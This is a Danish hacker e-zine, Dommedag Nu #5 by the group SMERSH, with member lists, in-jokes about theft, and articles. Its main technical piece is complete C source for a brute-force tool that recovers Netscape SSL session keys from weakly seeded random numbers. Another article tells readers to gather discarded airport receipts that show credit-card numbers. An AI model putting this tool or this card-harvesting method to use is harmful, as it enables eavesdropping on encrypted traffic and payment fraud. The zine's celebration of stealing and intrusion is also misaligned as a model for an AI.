310200 Z JAN 1996
STARTEX



          غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ
          غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ
          غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ
          غ       غ غ  غغغ  غ غ       غ غ      غغ غ       غ غغ  غغ  غ
          غغغغغغ  غ غ   غ   غ غغغغغغ  غ غغغغغغ  غ غغغغغغ  غ غغ  غغ  غ
          غ  غغغغغغ غ       غ غغ  غغغغغ غغ  غغ  غ غ  غغغغغغ غغ  غغ  غ
          غ       غ غ  غ غ  غ غغ    غغغ غغ     غغ غ       غ غغ      غ
          غغغغغغ  غ غ  غغغ  غ غ   غغغغغ غ     غغغ غغغغغغ  غ غ   غغ  غ
          غ  غغغ  غ غ  غغغ  غ غ   غغ  غ غ   غ  غغ غ  غغغ  غ غ   غغ  غ
          غ       غ غ  غغغ  غ غ       غ غ   غغ  غ غ       غ غ   غغ  غ
          غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ
          غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ
          غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ غغغغغغغغغ

                          D O M M E D A G   N U   # 5

                         Quis custodiet ipsos custodes?




                          S† chockerende (i kvalitet),
                            S† smagl›st (i indhold),
            Og uden et gram social samvittighed (yeps, det er os!),
                         Kan man andet end at elske os?



De 11 p† toppen:        Eksklusiv skribent..... Saron
                        KTAS h‘vneren.......... Clive Sharp
                        L‘rlingen.............. Narkobagmanden
                        Helten................. 99papa
                        Kongen................. Darkman
                        Negeren................ Leroy
                        Arbejdsl›s SYSGUD...... Deja-vu
                        Den flotte............. Bobby Ewing
                        KTAS-keld.............. Doggman
                        Den flinke............. *Krigeren
                        Den onde............... Darkseed

UAFD:                   Darkside Connection.... 45974344
                        Space Oddity........... 48796355
                        Alien Staircase........ 31575188
                        Plan-B.............Kommer snart!

DDN/E-Post:             d95322@rix01.lyngbyes.dk

De sagde:       "Hvad fanden skal vi ogs† bruge det til?? Vi kan
                jo ikke engang sidde i det!!" Sagt med lettere
                hysterisk stemme af Deja-vu, da han og Clive Sharp
                en torsdag aften stjal et KTAS telt i den indre by,
                og efter at havde l›bet de ca. 100 meter hen til
                bilen, s† fandt de ud af, at teltet (og nu ogs† Clive
                Sharp og Deja-vu) var smurt ind i mudder!  [Han var
                IKKE glad -red].

                "N†r jeg bliver fuld, s† l›ber jeg ofte n›gen rundt!"
                Sagt, dybt alvorligt, af Darkman til en LETTERE choc-
                keret Clive Sharp. [Clive Sharp har efterf›lgende holdt
                sig v‘k, n†r Darkman er fuld -red].

                "Lidt paranoia er altid godt, men tror du ikke, at i
                overdriver bare lidt??" Sagt af en tydeligt p†virket
                Darkseed, efter at Deja-vu og Clive Sharp n‘gtede at
                validere en bruger, som havde svaret p† alle undtagen
                2 sp›rgsm†l, p† PLAN-B. Grunden: "Han lugtede af
                "sikkerheds-ekspert", ingen andre har svaret p† s† mange
                sp›rgsm†l f›r".

                "NNEEEEEJJJJJ!!! DE FIK MIG!!!! SVIN!!!!" skreget af en
                presset Clive Sharp, der efter en h†rd arbejdsdag kom
                hjem til et brev fra Rigspolitiets Dataafdeling! Han
                troede selvf›lgeligt, at de (endelig) havde f†et noget
                snavs p† ham [hvad dog?? -red], s† han blev temmeligt
                overrasket (og temmelig flov) da han †bnede brevet, og
                fandt sit nye k›rekort.

                "Fuck! Jeg har ikke nok linier..... hmmm.... Jeg smutter
                lige ud og tr‘kker nogle flere fra boksen". Sagt i dybeste
                alvor af Leroy under en af SMERSH's mange night-sessions.

De takker:      Narcoid.....Formand for den eneste *OFFICIELLE* DDN fan-club.
                 TorNado ............................Dine virusser spiller.
                Titan........................................Tak for hj‘lpen.
                VOS............................................Du er for sej.
                Yod........................................Du er lige s† sej.
                Stumpen............................Din klub/hal er for elite!
                Vangeliz...........................................Du styrer!
                Savage......................................Du er for l‘kker!
                Mr. Nobody.....................................Du m† ha' det!
                Cynic............................Sjovt at m›de dig p† TP '95.

De anbefaler:   A Better Tomorrow, Tricky, TETSUO II - Body hammer, The Killer,
                Once A Thief, Hard Boiled, Space Marine, Deathwing, Inquisitor,
                VLAD, COTNO, KMFDM, PLA, People Haters, Sarah Louise Young,
                Open Season, ‌stkyst Hustlers, RAHOWA.

De mener:       "Vi arbejdede h†rdt, men hver gang det begyndte at fungere,
                blev nye planer om omorganisering iv‘rksat. Jeg l‘rte mig
                senere i livet at vi er tilb›jelige til at m›de hver ny situ-
                ation gennem omorganisering og jeg l‘rte ogs†, hvilken vid-
                underlig metode dette er til at skabe illusion om fremgang,
                mens det i virkeligheden for†rsager kaos, ineffektivitet og
                demoralisering". Citat fra romanen "Satirae" skrevet af Cajus
                Petronius, der d›de †r 66 e.kr. efter et liv som embedsmand
                hos den romerske kejser Nero [fundet i KTAS's affald af
                99papa og Narkobagmanden].


Indholdsfortegnelse:

1.  Indledning.
2.  D†rlig tilf‘ldigheds-generator i den f›rste version af Netscape.
3.  Hjernebl›dning hos Tele Danmark.
4.  Dommedag Nu's lette krydsord.
5.  Janek - hvad gik der galt i dit liv?!
6.  DDNGVOBB - File-wipe.
7.  Danmark Direkte Telekort.
8.  Yitzhak-Rabin - en virus.
9.  The Party '95 - hvad gik der galt?
10. Boghj›rnet, vi anmelder:
        Hackers.
        The Virus Creation Labs - A Journey Into The Underground.
        Information Warfare, Chaos on the Electronic Superhighway.
11. Nyheder fra den Danske presse:
        S†dan beskytter du dig mod HACKERE. [Rapport Classic].
        Ung hacker arresteret. [ComputerWorld].
        Ny virus skaber forvirring. [ComputerWorld].
        Sikkerhed p† Internettet. [Jyllandsposten].
        N†r politiet er med p† en lytter. [Jyllandsposten].
        Krypto-politik til debat. [Politiken].
        Hackernes betvinger. [Politiken].
        Dixie - en hacker har talt. [Politiken].
        Digitale infektioner. [Politiken].
        Privatliv sikret p† Nettet. [Politiken].
        Tal trygt i telefon. [MOBIL magasinet].
        Et sp›rgsm†l om timing at opdage datakriminalitet. [ComputerWorld].
        Forbrydelsens hovedvej. [Jyllandsposten].
        Politiet sl†s med krypterede diske. [ComputerWorld].
        Virus fra Internet i karant‘ne. [Politiken].
        Den elektroniske akillesh‘l. [ComputerWorld].
        H†rdere kurs mod hackere. [Berlingske Tidende].
        Aflytning af hackere. [Politiken].
        Angreb p† Nettet. [Politiken].
        Minister afviser Dansk net-politi. [Politiken].


             ‏S‏M‏E‏R‏S‏H‏‏D‏O‏M‏M‏E‏D‏A‏G‏‏N‏U‏‏#‏5‏‏S‏M‏E‏R‏S‏H‏


                         Indledning til Dommedag Nu #5
                                 Af Clive Sharp

        Ja, s† er vi her igen. Det l‘nge ventede mummer af Dommedag Nu #5 er p†
gaden! Og der er sket en del ting siden sidst. Pat Bateman har forladt os, da
han syntes, at det er sjovere at tjene penge, og det kan man jo ikke ben‘gte.
Men vi har ogs† f†et nogle nye medlemmer, de er:

        Darkman:        Han tiggede mig i 3 m†neder, hvorefter han begyndte at
                        bestikke mig, for at blive medlem. Normalt kan jeg ikke
                        bestikkes, men da jeg s† Darkman ligge p† kn‘ med t†r-
                        ere i ›jnene, blev jeg dybt r›rt, og han blev medlem.
                        Nej seri›st, han er Danmarks 100% bedste H/P/V type, og
                        vi er glade for at have ham med.

        Leroy:          En rimeligt stabil all-round hacker/phreaker, der har
                        styr p† sit liv.

        Doggman:        Garanti: Indenfor « †r, er han den sejeste phreaker
                        Europa nogensinde har set!

        Bobby Ewing:    Endnu et medlem til vores h‘r af trashere.

        *Krigeren:      Vores allesammens coder/copy slave.

        Ellers har der v‘ret rimeligt gang i den, her i lille Danmark. Hacking
(generelt) og datasikkerhed har v‘ret meget oppe i medierne i den seneste tid,
se bare p† antallet af artikler i dette nummer. L‘g is‘r m‘rke til den artikel
der hedder: "H†rdere kurs mod hackere", da den er udtryk for en ny holdnings-
‘ndring hos vores retssystem. Det kunne g† hen og blive ubehageligt.

        Men ogs† p† filmside har hacker-temaet v‘ret oppe og vende et par gange
i den seneste tid. F›rst kom Johnny Mnemonic som jeg syntes er en fed film. Den
voldtager ganske vist novellen af William Gibson, men den er tro mod id‚en. S†
kom The Net. Den s† vildt sej ud (og Sandra Bullock er ganske flot), s† jeg
stormede ind og s† den. At sige at jeg blev skuffet er en enorm underdrivelse.
Jeg har sj‘ldent set s†dan en gang lort. Det minder mest om hvordan verden ser
ud om 10 †r, HVIS Bill Gates blev pr‘sident. ALT i den film er grafisk-bruger-
flade, og temmeligt urealistisk. Den er RINGE. S† kom Hackers, og hvis jeg tro-
ede at The Net var d†rlig, s† gik jeg i bagl†s da jeg s† Hackers. Den er dob-
belt s† ringe som The Net, og det siger en del! Den var s† ringe, at jeg flov-
ede mig over at v‘re hacker, og det skal der ellers en del til. Bare for at
s‘tte tingene i perspektiv, s† benyttede TV2's julekalende (d. 24) sig ogs† af
hacking, og det var mere teknisk korrekt end Hackers og The Net, tilsammen!
Tag den Hollywood!

        Denne gang har vi lidt mere kode med, og det er (ellers stik imod vores
principper) skrevet p† engelsk. Grunden hertil er, at andre end lige Danskere
kan have nytte af den (koden), og desuden er der en del tekniske udtryk som
ikke er s† nemme at overs‘tte til Dansk, og s† stadig bibeholde meningen i tek-
sten.

        Ellers s† gl‘der det mig, at vi i den seneste tid har f†et en masse nye
hackere p† den Danske scene. Alle er ikke lige gode, men tendensen g†r i den
rigtige retning, og inden l‘nge er vi nok oppe p† '91-93 niveau (ihvertfald i
antal, hvis ikke i kvalitet). Hvis man har gang i nogle systemer, og sidder
fast, s† er Darkside Connection altid et godt sted, hvor man kan f† kvalifi-
ceret hj‘lp. Og det er ligemeget hvor trivielle ens problemer er.

        Men det smerter mig, at se folk som Janek, som tror at de er hackere,
men det er de bare IKKE. Undg† at lave samme fejl som dem! Se den relaterede
artikel i dette nummer af Dommedag Nu!

        Ja, der kommer flere numre af Dommedag Nu, selvom jeg skrev noget andet
i Dommedag Nu #4. N‘ste nummer vil prim‘rt omhandle UNIX-hacking, TCP/IP og
aktuelle sikkerhedshuller. Vi havde h†bet p†, at UNIX artiklen var f‘rdig til
dette nummer, men s†dan skulle det nu ikke g†. Vi mangler stadig artikler, s†
hvis du sidder og ved noget, som du mener har relevans til Hacking/Phreaking/
Virus scenen, s† skriv en artikel og upload den p† Darkside Connection. Og nej,
Anarchy har INGEN interesse!

        Derudover g†r vi med planer om at f† Plan-B op at k›re igen, og vi reg-
ner med, at det bliver engang i starten af Marts. Det er selvf›lgeligt afh‘ng-
igt af, hvorn†r Deja-vu f†r fingeren ud, og scorer sig en linie.



             ‏S‏M‏E‏R‏S‏H‏‏D‏O‏M‏M‏E‏D‏A‏G‏‏N‏U‏‏#‏5‏‏S‏M‏E‏R‏S‏H‏


        D†rlig tilf‘ldigheds-generator i den f›rste version af Netscape
                                   Af Darkman

        For at f›lge op p† artiklen i Dommedag Nu 4: "Sikkerhedshul i Netscape"
af Pia Lykke Andersen, bringer vi nu source koden til et program, der kan finde
krypterings n›glen som Netscape laver.

        Sikkerhedshullet i Netscape er, at de input programmet Netscape bruger
for at laver krypterings n›gler, er baseret p† systemets tid i sekunder og
hundrededelssekunder, og nogle andre informationer fra systemmet. Alle disse
input er ikke videre sv‘re at finde p† et andet system. Man kan finde disse
input, eller nogle informationer som ligger t‘t op af de n›dvendige input og
man kan derved beregne sig til de n›dvendige input, ved at etablerer kontakt
til nogle af det p†g‘ldende systems port. Da Netscape ikke nulstiller
krypterings n›glen, hver gang der bliver etableret ny kontakt, men derimod
laver en ny krypterings n›gle med kun den gamle krypterings n›gle som input,
g›r det ikke den omtalte process sv‘re, da vi kun beh›ver at finde den f›rste
krypterings n›gle, og n†r den er fundet, er det intet problem at beregne de
fremtidige krypterings n›gle.

        Foruden bruger nogle platforme af Netscape en 40-bit kryptering n›gle
og ingen af Netscape's plateforme bruger en st›rre krypterings n›gle en 128-bit
og det er blevet offentliggjort at man har brudt en 512-bit krypterings n›gle.

        Men alt dette er meget nemmere at forst† ved at kigge p† source koden.
Source koden er ikke udviklet af Darkman.

/* unssl.c - Last update: 950917

   Break netscape's shoddy implementation of SSL on some platforms
   (tested for netscape running RC4-40 on Solaris and HP-UX; other
    Unices are probably similar; other crypt methods are unknown, but
    it is likely that RC4-128 will have the same problems).

   The idea is this: netscape seeds the random number generator it uses
   to produce challenge-data and master keys with a combination of the
   time in seconds and microseconds, the pid and the ppid.  Of these,
   only the microseconds is hard to determine by someone who
   (a) can watch your packets on the network and
   (b) has access to any account on the system running netscape.

   Even if (b) is not satisfied, the time can often be obtained from
   the time or daytime network daemons; an approximation to the pid can
   sometimes be obtained from a mail daemon (the pid is part of most
   Message-ID's); the ppid will usually be not much smaller than the pid,
   and has an higher than average chance of being 1.  Clever guessing
   of these values will in all likelihood cut the expected search space
   down to less than brute-forcing a 40-bit key, and certainly is less
   than brute-forcing a 128-bit key.

   Subsequent https: connections after the first (even to different hosts)
   seem to _not_ reseed the RNG.  This makes things much easier, once
   you've broken the first message.  Just keep generating 16 bytes of
   random numbers until you get the challenge-data for the next message.
   The next key will then be the 16 random bytes after that.

   main() and bits of MD5Transform1 by Ian Goldberg <iang@cs.berkeley.edu>
   and David Wagner <daw@cs.berkeley.edu>.  The rest is taken from the
   standard MD5 code; see below.

   This code seems to want to run on a big-endian machine.  There may be
   other problems as well.  This code is provided as-is; if it causes you
   to lose your data, sleep, civil liberties, or SO, that's your problem.

#include <std/disclaimer.h>

   On the command line, give the time in seconds, the pid, the ppid and
   the SSL challenge data (each byte in hex, separated by some non-hex
   character like a colon) of the _first_ SSL message generated by
   the instance of netscape.  This program will search through the
   microsecond values.  You may need to run it again with a slightly
   different value for the seconds, depending on how accurately you know
   the time on the system running netscape.  The output will be the
   master key (all 16 bytes; note you never even told the program the
   11 bytes you knew) and the value for the microseconds that produced it.

   As a benchmark, this code runs in just under 25 seconds real time
   (for an unsuccessful search through 1<<20 values for the microseconds)
   on an unloaded HP 712/80.
*/

#include <stdio.h>
#include <stdlib.h>

/*
   I suppose parts of MD5Transform1 fall under:

   portions derived from RSA Data Security, Inc., MD5 message-digest algorithm

   Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
   rights reserved.

   License to copy and use this software is granted provided that it
   is identified as the "RSA Data Security, Inc. MD5 Message-Digest
   Algorithm" in all material mentioning or referencing this software
   or this function.

   License is also granted to make and use derivative works provided
   that such works are identified as "derived from the RSA Data
   Security, Inc. MD5 Message-Digest Algorithm" in all material
   mentioning or referencing the derived work.  
                                                                    
   RSA Data Security, Inc. makes no representations concerning either
   the merchantability of this software or the suitability of this
   software for any particular purpose. It is provided "as is"
   without express or implied warranty of any kind.  
                                                                    
   These notices must be retained in any copies of any part of this
   documentation and/or software.  
 */

typedef unsigned int UINT4;

/* Constants for MD5Transform routine.
 */
#define S11 7
#define S12 12
#define S13 17
#define S14 22
#define S21 5
#define S22 9
#define S23 14
#define S24 20
#define S31 4
#define S32 11
#define S33 16
#define S34 23
#define S41 6
#define S42 10
#define S43 15
#define S44 21

/* F, G, H and I are basic MD5 functions.
 */
#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~z)))

/* ROTATE_LEFT rotates x left n bits.
 */
#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))

/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4.
   Rotation is separate from addition to prevent recomputation.
 */
#define FF(a, b, c, d, x, s, ac) { \
    (a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }
#define GG(a, b, c, d, x, s, ac) { \
    (a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }
#define HH(a, b, c, d, x, s, ac) { \
    (a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }
#define II(a, b, c, d, x, s, ac) { \
    (a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }

void MD5Transform1(unsigned char state[16], unsigned char block[64])
{
  UINT4 a = 0x67452301, b = 0xefcdab89, c = 0x98badcfe, d = 0x10325476, x[16];
  unsigned int i,j;

  for (i = 0, j = 0; j < 64; i++, j += 4)
    x[i] = ((UINT4)block[j]) | (((UINT4)block[j+1]) << 8) |
      (((UINT4)block[j+2]) << 16) | (((UINT4)block[j+3]) << 24);

  /* Round 1 */
  FF (a, b, c, d, x[ 0], S11, 0xd76aa478); /* 1 */
  FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 */
  FF (c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */
  FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); /* 4 */
  FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); /* 5 */
  FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */
  FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */
  FF (b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 */
  FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */
  FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); /* 10 */
  FF (c, d, a, b, x[10], S13, 0xffff5bb1); /* 11 */
  FF (b, c, d, a, x[11], S14, 0x895cd7be); /* 12 */
  FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */
  FF (d, a, b, c, x[13], S12, 0xfd987193); /* 14 */
  FF (c, d, a, b, x[14], S13, 0xa679438e); /* 15 */
  FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */

  /* Round 2 */
  GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */
  GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */
  GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */
  GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */
  GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 21 */
  GG (d, a, b, c, x[10], S22,  0x2441453); /* 22 */
  GG (c, d, a, b, x[15], S23, 0xd8a1e681); /* 23 */
  GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); /* 24 */
  GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); /* 25 */
  GG (d, a, b, c, x[14], S22, 0xc33707d6); /* 26 */
  GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); /* 27 */
  GG (b, c, d, a, x[ 8], S24, 0x455a14ed); /* 28 */
  GG (a, b, c, d, x[13], S21, 0xa9e3e905); /* 29 */
  GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); /* 30 */
  GG (c, d, a, b, x[ 7], S23, 0x676f02d9); /* 31 */
  GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); /* 32 */

  /* Round 3 */
  HH (a, b, c, d, x[ 5], S31, 0xfffa3942); /* 33 */
  HH (d, a, b, c, x[ 8], S32, 0x8771f681); /* 34 */
  HH (c, d, a, b, x[11], S33, 0x6d9d6122); /* 35 */
  HH (b, c, d, a, x[14], S34, 0xfde5380c); /* 36 */
  HH (a, b, c, d, x[ 1], S31, 0xa4beea44); /* 37 */
  HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); /* 38 */
  HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); /* 39 */
  HH (b, c, d, a, x[10], S34, 0xbebfbc70); /* 40 */
  HH (a, b, c, d, x[13], S31, 0x289b7ec6); /* 41 */
  HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); /* 42 */
  HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); /* 43 */
  HH (b, c, d, a, x[ 6], S34,  0x4881d05); /* 44 */
  HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); /* 45 */
  HH (d, a, b, c, x[12], S32, 0xe6db99e5); /* 46 */
  HH (c, d, a, b, x[15], S33, 0x1fa27cf8); /* 47 */
  HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); /* 48 */

  /* Round 4 */
  II (a, b, c, d, x[ 0], S41, 0xf4292244); /* 49 */
  II (d, a, b, c, x[ 7], S42, 0x432aff97); /* 50 */
  II (c, d, a, b, x[14], S43, 0xab9423a7); /* 51 */
  II (b, c, d, a, x[ 5], S44, 0xfc93a039); /* 52 */
  II (a, b, c, d, x[12], S41, 0x655b59c3); /* 53 */
  II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); /* 54 */
  II (c, d, a, b, x[10], S43, 0xffeff47d); /* 55 */
  II (b, c, d, a, x[ 1], S44, 0x85845dd1); /* 56 */
  II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); /* 57 */
  II (d, a, b, c, x[15], S42, 0xfe2ce6e0); /* 58 */
  II (c, d, a, b, x[ 6], S43, 0xa3014314); /* 59 */
  II (b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */
  II (a, b, c, d, x[ 4], S41, 0xf7537e82); /* 61 */
  II (d, a, b, c, x[11], S42, 0xbd3af235); /* 62 */
  II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); /* 63 */
  II (b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */

  a += 0x67452301;
  b += 0xefcdab89;
  c += 0x98badcfe;
  d += 0x10325476;
  
  /* We need to swap endianness here */
  state[0] = ((unsigned char *)&a)[3];
  state[1] = ((unsigned char *)&a)[2];
  state[2] = ((unsigned char *)&a)[1];
  state[3] = ((unsigned char *)&a)[0];
  state[4] = ((unsigned char *)&b)[3];
  state[5] = ((unsigned char *)&b)[2];
  state[6] = ((unsigned char *)&b)[1];
  state[7] = ((unsigned char *)&b)[0];
  state[8] = ((unsigned char *)&c)[3];
  state[9] = ((unsigned char *)&c)[2];
  state[10] = ((unsigned char *)&c)[1];
  state[11] = ((unsigned char *)&c)[0];
  state[12] = ((unsigned char *)&d)[3];
  state[13] = ((unsigned char *)&d)[2];
  state[14] = ((unsigned char *)&d)[1];
  state[15] = ((unsigned char *)&d)[0];

}

#define mklcpr(val)    ((0xdeece66d*(val)+0x2bbb62dc)>>1)

int main(int argc, char **argv)
{
    int i;
    unsigned char       maybe_challenge[16], true_challenge[16];
    unsigned char       key[16];
    char        *p;
    unsigned long       sec, usec, pid, ppid;
    unsigned char       eblock[64], cblock[64];
    unsigned char       *o1;
    int o2;

    if (argc == 5 && strlen(argv[4]) >= 47) {
        sec = strtol(argv[1], (char **) 0, 0);
        pid = strtol(argv[2], (char **) 0, 0);
        ppid = strtol(argv[3], (char **) 0, 0);
        p = argv[4];
        for (i=0; i<16; i++) {
            true_challenge[i] = strtol(p, &p, 16);
            p++;
        }
    }
    else
    {
        printf("Usage: %s sec pid ppid "
            "00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff\n", argv[0]);
        exit(1);
    }

    /* Set up eblock and cblock */
    for(i=0;i<64;++i) eblock[i]=0;
    eblock[8] = 0x80;
    eblock[56] = 0x40;

    for(i=0;i<64;++i) cblock[i]=0;
    cblock[16] = 0x80;
    cblock[56] = 0x80;

    ((int *)eblock)[1] = mklcpr(pid+sec+(ppid<<12));
    for (usec=0; usec < (1<<20); usec++) {
        ((int *)eblock)[0] = mklcpr(usec);

        MD5Transform1(cblock, eblock);

        o2 = 0;
        o1 = &(cblock[0x0f]);
        do {
            if ((*o1)++) break;
            --o1;
        } while (++o2 <= 0x0f);

        o2 = 0;
        o1 = &(cblock[0x0f]);
        do {
            if ((*o1)++) break;
            --o1;
        } while (++o2 <= 0x0f);

        MD5Transform1(maybe_challenge, cblock);

        if (memcmp(maybe_challenge, true_challenge, 0x10) == 0) {
            printf("Found it!  The key is ");

            o2 = 0;
            o1 = &(cblock[0x0f]);
            do {
                if ((*o1)++) break;
                --o1;
            } while (++o2 <= 0x0f);

            MD5Transform1(key, cblock);

            for (i=0; i<0x10; i++)
                printf("%2.2X ", (unsigned char) key[i]);
            printf("\n");
            printf("usec = %lu\n", usec);
            exit(0);
        }
    }
    printf("Not found.\n");
    exit(1);
}


             ‏S‏M‏E‏R‏S‏H‏‏D‏O‏M‏M‏E‏D‏A‏G‏‏N‏U‏‏#‏5‏‏S‏M‏E‏R‏S‏H‏


                        Hjernebl›dning hos Tele Danmark
                                 Af Clive Sharp

        Undertegnede har, siden sidste nummer af Dommedag Nu, v‘ret en tur i
USA. Og ja, allerede i lufthavnen, gik det op for mig, hvor ringe Tele Danmark
egentlig er. Her er, hvad jeg fandt, i de specielle kreditkort-telefoner:

** COPENHAGEN AIRPORT **   0

Telefonens l›be nr.: 3589
Dato  : 05-09-95
Tid   : 05:10
Kort nr.  : 4512345678912345
Gyldigt til og med : 11-95
Kaldt nr.        : 004545974344
Opkaldets art    : PHONE
Varighed         : 0000'51"
Pris             : 00015.25 DKK
***** Tele Danmark ****

        Har de folk INTET l‘rt, selv ikke efter at b†de ComputerWorld, TV 2 og
DR, har haft historier om folk, der har misbrugt AT&T med kortnumre der var
fundet i Brugsen og andre steder. Dette er i mine ›jne v‘rre, fordi her kan man
se, hvor folk har ringet hen. P† mindre end 20 min., havde jeg 13 af disse
kviteringer, s† n‘ste gang du er i lufthavnen, check det ud! [Alle numre er
‘ndret -red].


             ‏S‏M‏E‏R‏S‏H‏‏D‏O‏M‏M‏E‏D‏A‏G‏‏N‏U‏‏#‏5‏‏S‏M‏E‏R‏S‏H‏


                          Dommedag Nu's lette krydsord
                           Af Clive Sharp og Darkman

        Ja, s† har Dommedag nu gjort det igen! Vi vender st‘rkt tilbage med
lidt underholdning til de lange vinteraftner. Men dette er ikke bare for din
forn›jelse. Dette er en konkurrence! Den f›rste der indsender dette krydsord
til Dommedag Nu, har vundet en tur i byen med SMERSH, alt betalt! S† bare g†
igang drenge.


 1حححرححح5حححرحححرحححرححح7حححرحححرححح30ححرحححرححح9حححرحححرححح21ححرحححرححح19حح»
 ؛   ³   ³   ³   ³   ³   ³   ³   ³ غ ³   ³   ³   ³   ³   ³   ³   ³ غ ³ غ ³   ؛
 اؤؤؤإؤؤؤ6ؤؤؤإؤؤؤإؤؤؤإؤؤؤ16ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ15ؤؤإؤؤؤإؤؤؤ25ؤؤإؤؤؤإؤؤؤ¶
 ؛   ³ غ ³   ³   ³   ³ غ ³   ³   ³   ³   ³   ³   ³   ³   ³   ³   ³   ³ غ ³   ؛
 اؤؤؤإؤؤؤ8ؤؤؤإؤؤؤإؤؤؤ18ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ23ؤؤإؤؤؤ¶
 ؛   ³ غ ³   ³   ³ غ ³   ³   ³   ³ غ ³ غ ³ غ ³ غ ³   ³   ³ غ ³   ³   ³   ³   ؛
 اؤؤؤ11ؤؤإؤؤؤإؤؤؤ10ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ27ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ¶
 ؛   ³   ³ غ ³ غ ³   ³   ³   ³   ³   ³   ³ غ ³ غ ³   ³   ³   ³   ³   ³   ³   ؛
 اؤؤؤإؤؤؤإؤؤؤإؤؤؤ12ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ¶
 ؛   ³   ³ غ ³ غ ³   ³   ³   ³   ³   ³   ³ غ ³ غ ³   ³   ³   ³   ³   ³   ³   ؛
 2ؤؤؤإؤؤؤ13ؤؤإؤؤؤ14ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ¶
 ؛   ³   ³   ³ غ ³   ³   ³   ³   ³   ³   ³ غ ³ غ ³   ³   ³   ³   ³ غ ³   ³   ؛
 اؤؤؤإؤؤؤإؤؤؤإؤؤؤ22ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ32ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ¶
 ؛ غ ³ غ ³   ³ غ ³   ³   ³   ³   ³ غ ³   ³   ³   ³ غ ³   ³ غ ³ غ ³ غ ³ غ ³   ؛
 3ؤؤؤ17ؤؤإؤؤؤإؤؤؤ20ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ28ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ¶
 ؛   ³   ³   ³ غ ³   ³   ³   ³   ³   ³ غ ³ غ ³   ³   ³   ³   ³   ³   ³   ³ غ ؛
 اؤؤؤإؤؤؤإؤؤؤ24ؤؤإؤؤؤإؤؤؤإؤؤؤ38ؤؤإؤؤؤإؤؤؤإؤؤؤ34ؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤإؤؤؤ¶
